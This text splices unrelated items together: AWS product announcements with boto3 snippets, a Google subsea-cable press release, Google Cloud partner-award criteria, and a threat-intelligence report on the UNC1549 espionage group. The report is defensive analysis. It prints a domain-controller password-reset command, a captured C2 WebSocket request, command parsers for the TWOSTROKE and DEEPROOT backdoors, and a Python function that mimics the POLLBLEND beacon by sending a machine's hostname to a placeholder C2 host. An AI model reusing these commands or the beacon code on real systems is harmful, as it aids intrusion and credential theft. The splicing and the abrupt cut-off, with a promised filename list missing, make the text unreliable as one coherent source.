Amazon Web Services (AWS) has expanded the regional availability for Amazon WorkSpaces Applications. Starting today, AWS customers can deploy their applications and desktops in the AWS Europe (Milan), Europe (Spain), Asia Pacific (Malaysia), and Israel (Tel Aviv) Regions and stream them using WorkSpaces Applications. Deploying your applications in a region closer to your end users helps provide a more responsive experience.
Amazon WorkSpaces Applications is a fully managed, secure application streaming service that provides users with instant access to their desktop applications from anywhere. It allows users to stream applications and desktops from AWS to their devices, without requiring them to download, install, or manage any software locally. WorkSpaces Applications manages the AWS resources required to host and run your applications, scales automatically, and provides access to your users on demand.
To get started with Amazon WorkSpaces Applications, sign in to the WorkSpaces Applications management console and select an AWS Region of your choice. For the full list of Regions where WorkSpaces Applications is available, see the AWS Region Table. WorkSpaces Applications offers pay-as-you-go pricing. For more information, see Amazon WorkSpaces Applications Pricing.
Today, we’re announcing Dhivaru, a new Trans-Indian Ocean subsea cable system that will connect the Maldives, Christmas Island and Oman. This investment will build on the Australia Connect initiative, furthering the reach, reliability, and resilience of digital connectivity across the Indian Ocean.
Reach, reliability and resilience are integral to the success of AI-driven services for our users and customers. Tremendous adoption of groundbreaking services such as Gemini 2.5 Flash Image (aka Nano Banana) and Vertex AI means resilient connectivity has never been more important for our users. The speed of AI adoption is also outpacing anyone’s predictions, and Google is investing to meet this long-term demand.
“Dhivaru” is the line that controls the main sail on traditional Maldivian sailing vessels, and signifies the skill, strength, and experience of the early sailors navigating the seas.
In addition to the cable investment, Google will be investing in creating two new connectivity hubs for the region. The Maldives and Christmas Island are naturally positioned for connectivity hubs to help improve digital connectivity for the region, including Africa, the Middle East, South Asia and Oceania.
“Google’s decision to invest in the Maldives is a strong signal of confidence in our country’s stable and open investment environment, and a direct contribution to my vision for a diversified, inclusive, and digitized Maldivian economy. As the world moves rapidly toward an era defined by digital transformation and artificial intelligence, this project reflects how the Maldives is positioning itself at the crossroads of global connectivity — leveraging our strategic geography to create new economic opportunities for our people and to participate meaningfully in the future of the global economy.” – His Excellency the President of Republic of Maldives
“We are delighted to partner with Google on this landmark initiative to establish a new connectivity hub in the Maldives. This project represents a major step forward in strengthening the nation’s digital infrastructure and enabling the next wave of digital transformation. As a leading digital provider, Ooredoo Maldives continues to expand world-class connectivity and digital services nationwide. This progress opens new opportunities for businesses such as tourism, enabling smarter operations, improved customer experiences and greater global reach. We are proud to be powering the next phase of the Digital Maldives.” – Ooredoo Maldives CEO and MD, Khalid Al Hamadi.
“Dhiraagu is committed to advancing the digital connectivity of the Maldives and empowering our people, communities, and businesses. Over the years, we have made significant investments in building robust subsea cable systems — transforming the digital landscape — connecting the Maldives to the rest of the world and enabling the rollout of high-speed broadband across the nation. We are proud and excited to partner with Google on their expansion of subsea infrastructure and the establishment of a new connectivity hub in Addu City, the southernmost city of the Maldives. This strategic collaboration with one of the world’s largest tech players marks another milestone in strengthening the nation’s presence within the global subsea infrastructure, and further enhances the reliability and resiliency of our digital ecosystem.” – Ismail Rasheed, CEO & MD, DHIRAAGU
Connectivity hubs for the Indian Ocean region
Connectivity hubs are strategic investments designed to future-proof regional connectivity and accelerate the delivery of next-generation services through three core capabilities: Cable switching, content caching, and colocation.
Cable switching: Delivering seamless resilience
Google carefully selects the locations for our connectivity hubs to minimize the distance data has to travel before it has a chance to ‘switch paths’. This capability improves resilience and ensures robust, high-availability connectivity across the region. The hubs also allow automatic re-routing of traffic between multiple cables: if one cable experiences a fault, traffic automatically selects the next best path and continues on its way. This ensures high availability not only for the host country, but also minimizes downtime for services and users across the region.
Content caching: Accelerating digital services
Low latency is critical for optimal user experience. One of Google’s objectives is to serve content from as close to our users and customers as possible. By caching — storing copies of the most popular content locally — Google can reduce the latency to retrieve or view this content, improving the quality of services.
Colocation: Fostering a local ecosystem
Connectivity hubs are often in locations, such as islands, where users have limited access to high-quality data centers to house their services and IT hardware. Although these facilities are small compared to a Google data center, Google understands the benefits of shared infrastructure and is committed to providing rack space to carriers and local companies.
Energy efficiency
Subsea cables are very energy efficient. As a result, even when supporting multiple cables, content storage, and colocation, a Google connectivity hub requires far less power than a typical data center. Connectivity hubs are primarily focused on networking and localized storage, not the large power demands of AI, cloud, and other important building blocks of the internet. Of course, the power required for a connectivity hub can still be significant for some smaller locations; where it is, Google is exploring using its power demand to accelerate local investment in sustainable energy generation, consistent with its long history of stimulating renewable energy solutions.
These new connectivity hubs in the Maldives and Christmas Island are ideally situated to deepen the resilience of internet infrastructure in the Indian Ocean Region. The facilities will help power our products, strengthen local economies and bring AI benefits to people and businesses around the world. We look forward to announcing future subsea cables and connectivity hubs and further enhancing the Internet’s reach, reliability, and resilience.
You can now designate delegated administrators for AWS Backup in 17 additional AWS Regions, enabling assigned users in member accounts to perform most administrative tasks.
Delegated administrators are now supported in Africa (Cape Town), Asia Pacific (Hong Kong, Hyderabad, Jakarta, Malaysia, Melbourne, New Zealand, Taipei, Thailand), Canada West (Calgary), Europe (Milan, Spain, Zurich), Israel (Tel Aviv), Mexico (Central), and Middle East (Bahrain, UAE). Delegated administration enables organizations to designate a central AWS account to manage backup operations across multiple member accounts, streamlining governance and reducing administrative overhead. Additionally, you can now use AWS Backup Audit Manager cross-Region and cross-account delegated administrator functionality in these Regions, empowering delegated administrators to create audit reports for jobs and compliance for backup plans that span these Regions.
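As a minimal sketch, assuming boto3 and a placeholder account ID, delegating AWS Backup administration to a member account is done from the organization's management account (trusted access for AWS Backup must already be enabled in your organization):

```python
# Minimal sketch (boto3): register a member account as the AWS Backup
# delegated administrator from the organization's management account.
# The account ID below is a placeholder.
import boto3

org = boto3.client("organizations")
org.register_delegated_administrator(
    AccountId="111122223333",                 # placeholder member account
    ServicePrincipal="backup.amazonaws.com",  # delegate AWS Backup administration
)
```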
Starting today, Amazon EC2 M8i and M8i-flex instances are now available in Asia Pacific (Mumbai) Region. These instances are powered by custom Intel Xeon 6 processors, available only on AWS, delivering the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. The M8i and M8i-flex instances offer up to 15% better price-performance, and 2.5x more memory bandwidth compared to previous generation Intel-based instances. They deliver up to 20% better performance than M7i and M7i-flex instances, with even higher gains for specific workloads. The M8i and M8i-flex instances are up to 30% faster for PostgreSQL databases, up to 60% faster for NGINX web applications, and up to 40% faster for AI deep learning recommendation models compared to M7i and M7i-flex instances.
M8i-flex instances are the easiest way to get price-performance benefits for a majority of general-purpose workloads like web and application servers, microservices, small and medium data stores, virtual desktops, and enterprise applications. They offer the most common sizes, from large to 16xlarge, and are a great first choice for applications that don’t fully utilize all compute resources.
M8i instances are a great choice for all general purpose workloads, especially for workloads that need the largest instance sizes or continuous high CPU usage. The SAP-certified M8i instances offer 13 sizes including 2 bare metal sizes and the new 96xlarge size for the largest applications.
Starting today, Amazon EC2 High Memory U7i instances with 12TB of memory (u7i-12tb.224xlarge) are now available in the AWS Europe (Ireland) Region. U7i-12tb instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7i-12tb instances offer 12TB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7i-12tb instances offer 896 vCPUs, support up to 100Gbps of Amazon Elastic Block Store (EBS) bandwidth for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server.
Today, AWS announced support for Resolver query logging configurations in Amazon Route 53 Profiles, allowing you to manage a Resolver query logging configuration and apply it to multiple VPCs and AWS accounts within your organization. With this enhancement, Amazon Route 53 Profiles simplifies the management of Resolver query logging by streamlining the process of associating logging configurations with VPCs, without requiring you to manually associate them with each VPC.
Route 53 Profiles allows you to create and share Route 53 configurations (private hosted zones, DNS Firewall rule groups, Resolver rules) across multiple VPCs and AWS accounts. Previously, Resolver query logging required you to manually set it up for each VPC in every AWS account. Now, with Route 53 Profiles you can manage your Resolver query logging configurations for your VPCs and AWS accounts, using a single Profile configuration. Profiles support for Resolver query logging configurations reduces the management overhead for network security teams and simplifies compliance auditing by providing consistent DNS query logs across all accounts and VPCs.
Route 53 Profiles support for Resolver query logging is now available in the AWS Regions mentioned here. To learn more about this capability and how it can benefit your organization, visit the Amazon Route 53 documentation. You can get started by accessing the Amazon Route 53 console in your AWS Management Console or through the AWS CLI. To learn more about Route 53 Profiles pricing, see here.
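As a minimal sketch, assuming boto3, an existing Route 53 Profile, and a CloudWatch Logs destination (IDs and ARNs below are placeholders), attaching a query logging configuration to a Profile might look like the following; confirm parameter names against the current Route 53 Profiles documentation:

```python
# Minimal sketch (boto3): create a Resolver query logging configuration once,
# then attach it to a Route 53 Profile instead of associating it with every VPC.
# All identifiers are placeholders.
import boto3

resolver = boto3.client("route53resolver")
profiles = boto3.client("route53profiles")

config = resolver.create_resolver_query_log_config(
    Name="org-query-logging",
    DestinationArn="arn:aws:logs:us-east-1:111122223333:log-group:/dns/queries",
    CreatorRequestId="org-query-logging-2025",
)["ResolverQueryLogConfig"]

profiles.associate_resource_to_profile(
    ProfileId="rp-0123456789abcdef",   # placeholder Profile ID
    ResourceArn=config["Arn"],
    Name="query-logging-for-profile",
)
```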
AWS Backup now supports logically air-gapped vaults as a primary backup target. You can assign a logically air-gapped vault as the primary target in backup plans, organization-wide policies, or on-demand backups. Previously, logically air-gapped vaults could only store copies of existing backups.
This capability reduces storage costs for customers who want the security and recoverability benefits of logically air-gapped vaults. Organizations wanting those benefits can now back up directly to a logically air-gapped vault without storing multiple backups.
Resource types that support full AWS Backup management back up directly to the specified air-gapped vault. For resource types without full management support, AWS Backup creates a temporary snapshot in a standard vault, copies it to the air-gapped vault, then removes the snapshot.
This feature is available in all AWS Regions that support logically air-gapped vaults. To get started, select a logically air-gapped vault as your primary backup target in the AWS Backup console, API, or CLI. For more information, visit the AWS Backup product page and documentation.
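As a minimal sketch, assuming boto3 and placeholder names, a backup plan rule can now name a logically air-gapped vault directly as its target vault:

```python
# Minimal sketch (boto3): a backup plan rule that writes directly to a logically
# air-gapped vault by naming it as the rule's target. Names and schedule are placeholders.
import boto3

backup = boto3.client("backup")
backup.create_backup_plan(
    BackupPlan={
        "BackupPlanName": "critical-data-airgapped",
        "Rules": [
            {
                "RuleName": "daily-to-airgapped-vault",
                "TargetBackupVaultName": "my-logically-airgapped-vault",  # placeholder vault
                "ScheduleExpression": "cron(0 5 * * ? *)",  # daily at 05:00 UTC
                "Lifecycle": {"DeleteAfterDays": 35},
            }
        ],
    }
)
```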
EC2 Image Builder now supports invoking Lambda functions and executing Step Functions state machines through image workflows. These capabilities enable you to incorporate complex, multi-step workflows and custom validation logic into your image creation process, providing greater flexibility and control over how your images are built and validated.
Prior to this launch, customers had to write custom code and implement multi-step workarounds to integrate Lambda or Step Functions within image workflows. This was a cumbersome process that was time-consuming to set up, difficult to maintain, and prone to errors. With these new capabilities, you can now seamlessly invoke Lambda functions to execute custom logic or orchestrate Step Functions state machines for complex, multi-step workflows. This native integration allows you to implement use cases such as custom compliance validation, sending custom notifications, and multi-stage security testing, all within your Image Builder workflow.
These capabilities are available to all customers at no additional cost, in all AWS Regions, including the AWS China (Beijing) Region, operated by Sinnet, the AWS China (Ningxia) Region, operated by NWCD, and the AWS GovCloud (US) Regions.
You can get started from the EC2 Image Builder Console, CLI, API, CloudFormation, or CDK, and learn more in the EC2 Image Builder documentation.
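As a rough sketch only: workflow documents are YAML registered through the CreateWorkflow API, and a Lambda-invoking test step might look like the following. The step action name ("InvokeLambdaFunction") and the function ARN are assumptions introduced for illustration; check the EC2 Image Builder documentation for the exact action module name.

```python
# Sketch only (boto3): register an Image Builder test workflow whose step invokes
# a Lambda function. The action name and ARN below are placeholders/assumptions.
import boto3

WORKFLOW_YAML = """
name: custom-validation
schemaVersion: 1.0
steps:
  - name: RunComplianceCheck
    action: InvokeLambdaFunction        # illustrative action name (assumption)
    inputs:
      functionArn: arn:aws:lambda:us-east-1:111122223333:function:image-compliance-check
"""

imagebuilder = boto3.client("imagebuilder")
imagebuilder.create_workflow(
    name="custom-validation",
    semanticVersion="1.0.0",
    type="TEST",
    data=WORKFLOW_YAML,
    clientToken="custom-validation-v1",
)
```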
Today, AWS announced that you can now designate Amazon EC2 instances running license-included SQL Server as part of a High-Availability (HA) cluster to reduce licensing costs with just a few clicks.
This enhancement is particularly valuable for mission-critical SQL Server databases with Always On Availability Groups and/or Always On failover cluster instances. For example, you can save up to 40% of the full HA costs with no performance compromises when running SQL Server HA on two m8i.4xlarge instances with license-included Windows and SQL Server.
This feature is available in all commercial AWS Regions.
To learn more, see Microsoft SQL Server on Amazon EC2 User Guide or read the blog post.
At Google Cloud, we have the honor of partnering with some of the most brilliant and inventive individuals across the world. Each year, the Google Cloud Partner All-stars program honors these remarkable people for their dedication to innovation and commitment to excellence. Our 2025 All-stars are pushing our industry forward, and we’re thrilled to celebrate them.
2025 Spotlight: AI Innovation
For 2025, we’re excited to introduce a new category that recognizes strategic leaders in enterprise-wide AI adoption. These honorees are trusted advisors, helping customers transform their business using Google AI. This includes implementing agentic AI to transform core processes, create new revenue streams, or redefine operating models.
These All-stars showcase a holistic vision for how AI integrates into a customer’s culture and strategy to drive lasting, measurable transformation that fundamentally alters business processes.
What sets Partner All-stars apart? The following qualities define what it means to be a Partner All-star:
AI Innovation
Guides customers through profound business transformation by driving enterprise-wide AI adoption
Establishes a strategic vision for integrating AI and autonomous agents into a customer’s operating model
Leverages agentic AI to redefine core processes, create new revenue streams, and transform business outcomes
Delivers lasting, measurable results that fundamentally alter a customer’s business processes
Delivery Excellence
Top-ranked personnel on Google Cloud’s Delivery Readiness Portal (DRP)
Displays commitment to technical excellence by passing advanced delivery challenge labs and other advanced technical training
Demonstrates excellent knowledge and adoption of Google Cloud delivery enablement methods, assets, and offerings
Exhibits expertise through customer project and deployment experience
Marketing
Drives strategic programs and key events that address customer concerns and priorities
Works with cross-functional teams to ensure the success of campaigns and events
Takes a data-driven approach to marketing, investing resources and time in programs that drive the biggest impact
Always explores areas of opportunity to improve future work
Sales
Embodies commitment to the customer transformation journey
Consistently meets and exceeds sales targets
Aligns on goals to deliver amazing end-to-end customer experiences
Prioritizes long-term customer relationships over short-term sales
Solutions Engineering
Delivers superior customer experiences by keeping professional skills up to date, earning at least one Google technical certification
Embraces customer challenges head-on, taking responsibility for end-to-end solutioning
Works with purpose, providing deliverables in a timely manner without compromising quality
Works effectively across joint product areas, leveraging technology in innovative ways to address customer needs
Celebrating excellence in 2025
On behalf of the entire Google Cloud team, I want to extend a much-deserved congratulations to our 2025 Google Cloud Partner All-stars. Their commitment to innovation is an inspiration to us and a driving force of success to our customers.
Follow the celebration and engage with #PartnerAllstars on social media to learn more about these exceptional leaders.
Written by: Mohamed El-Banna, Daniel Lee, Mike Stokkel, Josh Goddard
Overview
Last year, Mandiant published a blog post highlighting suspected Iran-nexus espionage activity targeting the aerospace, aviation, and defense industries in the Middle East. In this follow-up post, Mandiant discusses additional tactics, techniques, and procedures (TTPs) observed in incidents Mandiant has responded to.
Since mid-2024, Mandiant has responded to targeted campaigns by the threat group UNC1549 against the aerospace, aviation and defense industries. To gain initial access into these environments, UNC1549 employed a dual approach: deploying well-crafted phishing campaigns designed to steal credentials or deliver malware and exploiting trusted connections with third-party suppliers and partners.
The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures. This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target’s main security controls by first compromising a connected entity.
Operating from late 2023 through 2025, UNC1549 employed sophisticated initial access vectors, including abuse of third-party relationships to gain entry (pivoting from service providers to their customers), VDI breakouts from third parties, and highly targeted, role-relevant phishing.
Once inside, the group leverages creative lateral movement techniques, such as stealing victim source code for spear-phishing campaigns that use lookalike domains to bypass proxies, and abusing internal service ticketing systems for credential access. They employ custom tooling, notably DCSYNCER.SLICK—a variant deployed via search order hijacking to conduct DCSync attacks.
UNC1549’s campaign is distinguished by its focus on anticipating investigators and ensuring long-term persistence after detection. They plant backdoors that beacon silently for months, only activating them to regain access after the victim has attempted eradication. They maintain stealth and command and control (C2) using extensive reverse SSH shells (which limit forensic evidence) and domains strategically mimicking the victim’s industry.
Threat Activity
Initial Compromise
A primary initial access vector employed by UNC1549 involved combining targeted social engineering with the exploitation of compromised third-party accounts. Leveraging credentials harvested from vendors, partners, or other trusted external entities, UNC1549 exploited legitimate access pathways inherent in these relationships.
Third-Party Services
Notably, the group frequently abused Citrix, VMWare, and Azure Virtual Desktop and Application services provided by victim organizations to third party partners, collaborators, and contractors. Utilizing compromised third-party credentials, they authenticated to the supplier’s infrastructure, establishing an initial foothold within the network perimeter. Post-authentication, UNC1549 used techniques designed to escape the security boundaries and restrictions of the virtualized Citrix session. This breakout granted them access to the underlying host system or adjacent network segments, and enabled the initiation of lateral movement activities deeper within the target corporate network.
Spear Phishing
UNC1549 utilized targeted spear-phishing emails as one of the methods to gain initial network access. These emails used lures related to job opportunities or recruitment efforts, aiming to trick recipients into downloading and running malware hidden in attachments or links. Figure 1 shows a sample phishing email sent to one of the victims.
Figure 1: Screenshot of a phishing email sent by UNC1549
Following a successful breach, Mandiant observed UNC1549 pivoting to spear-phishing campaigns specifically targeting IT staff and administrators. The goal of this campaign was to obtain credentials with higher permissions. To make these phishing attempts more believable, the attackers often performed reconnaissance first, such as reviewing older emails in already compromised inboxes for legitimate password reset requests or identifying the company’s internal password reset webpages, and then crafted their malicious emails to mimic these authentic processes.
Establish Foothold
To maintain persistence within compromised networks, UNC1549 deployed several custom backdoors. Beyond MINIBIKE, which Mandiant discussed in the February 2024 blog post, the group also utilizes other custom malware such as TWOSTROKE and DEEPROOT. Significantly, Mandiant’s analysis revealed that while the malware used for initial targeting and compromises was not unique, every post-exploitation payload identified, regardless of family, had a unique hash. This included instances where multiple samples of the same backdoor variant were found within the same victim network. This approach highlights UNC1549’s sophistication and the considerable effort invested in customizing their tools to evade detection and complicate forensic investigations.
Search Order Hijacking
UNC1549 abused DLL search order hijacking to execute CRASHPAD, DCSYNCER.SLICK, GHOSTLINE, LIGHTRAIL, MINIBIKE, POLLBLEND, SIGHTGRAB, and TWOSTROKE payloads. Using the DLL search order hijacking techniques, UNC1549 achieved a persistent and stealthy way of executing their tooling.
Throughout the different investigations, UNC1549 demonstrated a comprehensive understanding of software dependencies by exploiting DLL search order hijacking in multiple software solutions. UNC1549 has deployed malicious binaries targeting legitimate Fortigate, VMWare, Citrix, Microsoft, and NVIDIA executables. In many cases, the threat actor installed the legitimate software after initial access in order to abuse search order hijacking; however, in other cases, the attacker leveraged software that was already installed on victim systems and then replaced or added the malicious DLLs within the legitimate installation directory, typically with SYSTEM privileges.
TWOSTROKE
TWOSTROKE, a C++ backdoor, utilizes SSL-encrypted TCP/443 connections to communicate with its controllers. This malware possesses a diverse command set, allowing for system information collection, DLL loading, file manipulation, and persistence. While showing some similarities to MINIBIKE, it’s considered a unique backdoor.
Upon execution, TWOSTROKE employs a specific routine to generate a unique victim identifier. TWOSTROKE retrieves the fully qualified DNS computer name using the Windows API function GetComputerNameExW(ComputerNameDnsFullyQualified). The retrieved name then undergoes an XOR encryption process using a static key. Following the encryption, the resulting binary data is converted into a lowercase hexadecimal string.
Finally, TWOSTROKE extracts the first eight characters of this hexadecimal string, reverses it, and uses it as the victim’s unique bot ID for later communication with the C2 server.
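For illustration, a minimal Python sketch of the described derivation follows. The static key and hostname are placeholders (the actual key is not reproduced here), and treating the name buffer as a UTF-16LE wide string is an assumption based on the use of GetComputerNameExW.

```python
# Sketch of the TWOSTROKE bot-ID derivation described above: XOR the fully
# qualified computer name with a static key, hex-encode, take the first eight
# characters, and reverse them. Key and hostname are placeholders.
def twostroke_bot_id(fqdn: str, key: bytes) -> str:
    data = fqdn.encode("utf-16-le")  # wide-string buffer (assumption)
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return xored.hex()[:8][::-1]     # first 8 hex chars, reversed

print(twostroke_bot_id("host01.corp.example.com", b"\x41"))  # placeholder key
```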
Functionalities
After TWOSTROKE sends its check-in request, the C2 server responds with a hex-encoded payload that contains multiple values separated by “@##@”. Depending on the received command, TWOSTROKE can execute one of the following (a parsing sketch follows the list):
1: Upload a file to the C2
2: Execute a file or a shell command
3: DLL execution into memory
4: Download file from the C2
5: Get the full victim user name
6: Get the full victim machine name
7: List a directory
8: Delete a file
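As a hedged illustration, the following Python sketch parses a response of this shape and maps the command number to the behaviors listed above; the field order (command number first, then arguments) is an assumption made for clarity.

```python
# Sketch of TWOSTROKE C2 response handling: hex-decode the payload, split on
# "@##@", and dispatch on the command number. Field order is illustrative.
def handle_twostroke_response(hex_payload: str) -> None:
    fields = bytes.fromhex(hex_payload).decode(errors="replace").split("@##@")
    command, args = fields[0], fields[1:]
    handlers = {
        "1": "upload file to C2",
        "2": "execute file or shell command",
        "3": "load DLL into memory",
        "4": "download file from C2",
        "5": "report victim user name",
        "6": "report victim machine name",
        "7": "list directory",
        "8": "delete file",
    }
    print(f"command {command}: {handlers.get(command, 'unknown')}, args={args}")
```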
LIGHTRAIL
UNC1549 was observed downloading a ZIP file from attacker-owned infrastructure. This ZIP file contained the LIGHTRAIL tunneler as VGAuth.dll, which was executed through search order hijacking using the VGAuthCLI.exe executable. LIGHTRAIL is a custom tunneler, likely based on the open-source Socks4a proxy LastenZug, that communicates using Azure cloud infrastructure.
There are several distinct differences between the LIGHTRAIL sample and the LastenZug source code. These include:
Increasing the MAX_CONNECTIONS from 250 to 5000
Static configuration inside the lastenzug function (wPath and port)
No support for using a proxy server when connecting to the WebSocket C2
Compiler optimizations reducing the number of functions (26 to 10)
Additionally, LastenZug uses hashing for DLL and API function resolution. By default, the hash value is XOR’d with the value 0x41507712, while the XOR value in the observed LIGHTRAIL sample differs from the original source code: 0x41424344 (‘ABCD’).
After loading the necessary API function pointers, initialization continues by populating the server name (wServerName), port, and URI (wPath) values. The port is hardcoded to 443 (for HTTPS) and the path is hardcoded to “/news.” This differs from the source code, where these values are input parameters to the lastenzug function.
The initWS function is responsible for establishing the WebSocket connection, which it does using the Windows WinHTTP API. The initWS function has a hard-coded User-Agent string, which it constructs as a stack string:
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136
Mandiant identified another LIGHTRAIL sample uploaded to VirusTotal from Germany. However, this sample seems to have been modified by the uploader as the C2 domain was intentionally altered.
GET https://aaaaaaaaaaaaaaaaaa.bbbbbb.cccccccc.ddddd.com/page HTTP/1.1
Host: aaaaaaaaaaaaaaaaaa.bbbbbb.cccccccc.ddddd.com
Connection: Upgrade
Upgrade: websocket
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136
Sec-WebSocket-Key: 9MeEoJ3sjbWAEed52LdRdg==
Sec-WebSocket-Version: 13
Figure 2: Modified LIGHTRAIL network communication snippet
Most notably, this sample uses a different URL path for its communication, and its User-Agent differs from the one observed in previous LIGHTRAIL samples and the LastenZug source code.
DEEPROOT
DEEPROOT is a Linux backdoor written in Golang that supports the following functionality: shell command execution, system information enumeration, and file listing, deletion, upload, and download. DEEPROOT was compiled to run on Linux systems; however, due to Golang’s cross-platform architecture, DEEPROOT could also be compiled for other operating systems. At the time of writing, Mandiant has not observed any DEEPROOT samples targeting Windows systems.
DEEPROOT was observed using multiple C2 domains hosted in Microsoft Azure. The observed DEEPROOT samples used multiple C2 servers per binary, suspected to provide redundancy in case one C2 server is taken down.
Functionalities
After DEEPROOT sends its check-in request, the C2 server responds with a hex-encoded payload that contains multiple values separated by ‘-===-’. The payload fields are as follows (a parsing sketch follows the list):
sleep_timeout is the time in milliseconds to wait before making the next request.
command_id is an identifier for the C2 command, used by the backdoor when responding to the C2 with the result.
command is the command number and it’s one of the following:
1 – Get directory information (directory listing), the directory path is received in argument_1.
2 – Delete a file, the file path is received in argument_1.
3 – Get the victim username.
4 – Get the victim’s hostname.
5 – Execute a shell command, the shell command is received in argument_1.
6 – Download a file from the C2, the C2 file path is received in argument_1 and the local file path is received in argument_2.
7 – Upload a file to the C2, the local file path is received in argument_1.
argument_1 and argument_2 are the command arguments and are optional.
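For illustration, a minimal Python sketch of parsing a DEEPROOT tasking payload of this shape follows; the field order mirrors the list above and should be treated as illustrative rather than a byte-accurate re-implementation.

```python
# Sketch of DEEPROOT tasking parsing: hex-decode the payload, split on "-===-",
# and interpret the fields in the order described above.
DEEPROOT_COMMANDS = {
    "1": "directory listing",
    "2": "delete file",
    "3": "get username",
    "4": "get hostname",
    "5": "execute shell command",
    "6": "download file from C2",
    "7": "upload file to C2",
}

def parse_deeproot_task(hex_payload: str) -> dict:
    fields = bytes.fromhex(hex_payload).decode(errors="replace").split("-===-")
    fields += [""] * (5 - len(fields))  # pad missing optional arguments
    sleep_timeout, command_id, command, arg1, arg2 = fields[:5]
    return {
        "sleep_ms": int(sleep_timeout),
        "command_id": command_id,
        "command": DEEPROOT_COMMANDS.get(command, "unknown"),
        "argument_1": arg1,
        "argument_2": arg2,
    }
```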
GHOSTLINE
GHOSTLINE is a Windows tunneler utility written in Golang that uses a hard-coded domain for its communication. GHOSTLINE uses the go-yamux library for its network connection.
POLLBLEND
POLLBLEND is a Windows tunneler written in C++. Earlier iterations of POLLBLEND featured multiple hardcoded C2 servers and utilized two hardcoded URI parameters for self-registration and tunneler configuration download. To register the machine, POLLBLEND reaches out to /register/ and sends an HTTP POST request with the following JSON body.
{"username": "<computer_name>"}
Figure 4: POLLBLEND body data
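For reference, a small Python sketch reproducing the shape of this registration request (for example, to emulate the beacon against infrastructure you control when building detections); the C2 host is a placeholder.

```python
# Sketch reproducing the POLLBLEND self-registration request described above:
# an HTTP POST to /register/ with a JSON body carrying the computer name.
# The C2 host is a placeholder; use only against infrastructure you control.
import json
import socket
import urllib.request

def pollblend_style_register(c2_host: str) -> None:
    body = json.dumps({"username": socket.gethostname()}).encode()
    req = urllib.request.Request(
        f"https://{c2_host}/register/",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    urllib.request.urlopen(req, timeout=10)

# pollblend_style_register("c2.example.invalid")   # placeholder host
```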
Code Signing
Throughout the tracking of UNC1549’s activity across multiple intrusions, the Iranian-backed threat group was observed signing some of their backdoor binaries with legitimate code-signing certificates—a tactic also covered by Check Point—likely to help their malware evade detection and bypass security controls like application allowlists, which are often configured to trust digitally signed code. The group employed this technique to weaponize malware samples, including variants for GHOSTLINE, POLLBLEND, and TWOSTROKE. All identified code-signing certificates have been reported to the relevant issuing Certificate Authorities for revocation.
Escalate Privileges
UNC1549 has been observed using a variety of techniques and custom tools aimed at stealing credentials and gathering sensitive data post-compromise. This included a utility, tracked as DCSYNCER.SLICK, designed to mimic the DCSync Active Directory replication feature. DCSync is a legitimate function domain controllers use for replicating changes via RPC. This allowed the attackers to extract NTLM password hashes directly from the domain controllers. Another tool, dubbed CRASHPAD, focused on extracting credentials saved within web browsers. For visual data collection, they deployed SIGHTGRAB, a tool capable of taking periodic screenshots, potentially capturing sensitive information displayed on the user’s screen. Additionally, UNC1549 utilized simpler methods, such as deploying TRUSTTRAP, which presented fake popup windows prompting users to enter their credentials, which were then harvested by the attackers.
UNC1549 frequently used DCSync attacks to obtain NTLM password hashes for domain users, which they then cracked in order to facilitate lateral movement and privilege escalation. To gain the necessary directory replication rights for DCSync, the threat actor employed several methods. They were observed unconventionally resetting passwords for domain controller computer accounts using net.exe. This action typically broke the domain controller functionality of the host and caused an outage, yet it successfully enabled them to perform the DCSync operation and extract sensitive credentials, including those for domain administrators and Azure AD Connect accounts. UNC1549 leveraged other techniques to gain domain replication rights, including creating rogue computer accounts and abusing Resource-Based Constrained Delegation (RBCD) assignments. They also performed Kerberoasting, utilizing obfuscated Invoke-Kerberoast scripts, for credential theft.
net user DC-01$ P@ssw0rd
Figure 5: Example of an UNC1549 net.exe command to reset a domain controller computer account
In some cases, shortly after gaining a foothold on workstations, UNC1549 discovered vulnerable Active Directory Certificate Services templates. They used these to request certificates, allowing them to impersonate higher-privileged user accounts.
UNC1549 also frequently targeted saved credentials within web browsers, either through malicious utilities or by RDP session hijacking. In the latter, the threat actor would identify which user was logged onto a system through quser.exe or wmic.exe, and then RDP to that system with the user’s account to gain access to their active and unlocked web browser sessions.
DCSYNCER.SLICK
DCSYNCER.SLICK is a Windows executable based on the open-source project DCSyncer, which in turn is based on Mimikatz source code. DCSYNCER.SLICK has been modified to use dynamic API resolution and has all of its printf statements removed.
Additionally, DCSYNCER.SLICK collects and XOR-encrypts the credentials before writing them to a hardcoded filename and path. The following hardcoded filenames and paths were observed being used by DCSYNCER.SLICK:
To evade detection, UNC1549 executed the malware within the context of a compromised domain controller computer account. They achieved this compromise by manually resetting the account password. Instead of utilizing the standard netdom command, UNC1549 used the Windows command net user <computer_name> <password>. Subsequently, they used these newly acquired credentials to execute the DCSYNCER.SLICK payload. This tactic would give the false impression that replication had occurred between two legitimate domain controllers.
CRASHPAD
CRASHPAD is a Windows executable written in C++ that decrypts the content of the file config.txt into the file crash.log by impersonating the explorer.exe user’s privileges and using the CryptUnprotectData API.
The contents of these files could not be determined because UNC1549 deleted the output after CRASHPAD was executed.
The CRASHPAD configuration and output file paths were hardcoded into the sample, similar to the LOG.txt filename found in the DCSYNCER.SLICK binary.
SIGHTGRAB
SIGHTGRAB is a Windows executable written in C that autonomously captures screenshots at regular intervals and saves them to disk. Upon execution, SIGHTGRAB dynamically loads several Windows libraries at runtime, including User32.dll, Gdi32.dll, and Ole32.dll. SIGHTGRAB implements runtime API resolution through LoadLibraryA and GetProcAddress calls with encoded strings to access system functions, using XOR encryption with a single-byte key of 0x41 to decode API function names.
